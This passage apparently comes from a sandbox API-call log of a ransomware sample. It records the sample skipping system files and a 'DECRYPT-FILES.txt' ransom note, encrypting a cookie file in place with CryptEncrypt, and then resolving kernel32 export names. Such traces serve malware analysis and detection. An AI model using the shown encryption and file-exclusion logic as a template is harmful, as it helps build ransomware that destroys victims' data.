dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.333] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.334] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.334] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6301df20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63a15b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63a15b40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", cAlternateFileName="5P93CC~1.TXT")) returned 1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="autorun.inf") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="boot.ini") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="desktop.ini") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="ntuser.dat") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="iconcache.db") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="bootsect.bak") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="thumbs.db") returned -1 [0079.334] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", lpString2="Bootfont.bin") returned -1 [0079.334] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@doubleclick[2].txt") returned 39 [0079.334] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.334] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.334] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.334] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.334] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@doubleclick[2].txt") returned 39 [0079.334] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.334] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@doubleclick[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" [0079.334] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.335] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=272) returned 1 [0079.335] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.336] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.336] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.336] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.336] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.336] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.337] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.337] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.337] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.337] CloseHandle (hObject=0x464) returned 1 [0079.338] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.338] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.339] CloseHandle (hObject=0x0) returned 0 [0079.339] CloseHandle (hObject=0x460) returned 1 [0079.340] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.340] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.340] GetTickCount () returned 0x114c543 [0079.340] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.341] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.341] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.341] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.341] lstrlenA (lpString="kernel32.dll") returned 12 [0079.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.341] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.341] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.341] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.341] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.341] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.341] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.342] lstrlenA (lpString="ADDATOMA") returned 8 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.342] lstrlenA (lpString="ADDATOMW") returned 8 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.342] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.342] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.342] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.342] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.342] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.342] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.342] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.342] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.342] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.342] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.342] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.342] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.342] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.342] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.342] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.342] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.343] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.343] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.343] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.343] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.343] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.343] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.343] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.343] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.343] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.343] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.343] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.343] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.343] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.343] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.343] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.343] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.343] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.343] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.343] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.344] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.344] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.344] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.344] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.344] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.344] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.344] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.344] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.344] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.344] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.344] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.344] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.344] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.344] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.344] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.344] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.344] lstrlenA (lpString="BEEP") returned 4 [0079.344] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.345] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.345] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.345] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.345] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.345] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.345] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.345] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.345] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.345] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.345] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.345] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.345] lstrlenA (lpString="CANCELIO") returned 8 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.345] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.345] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.345] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.345] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.345] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.345] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.345] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.346] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.346] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.346] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.346] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.346] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.346] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.346] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.346] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.346] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.346] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.346] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.346] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.346] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.346] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.346] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.346] 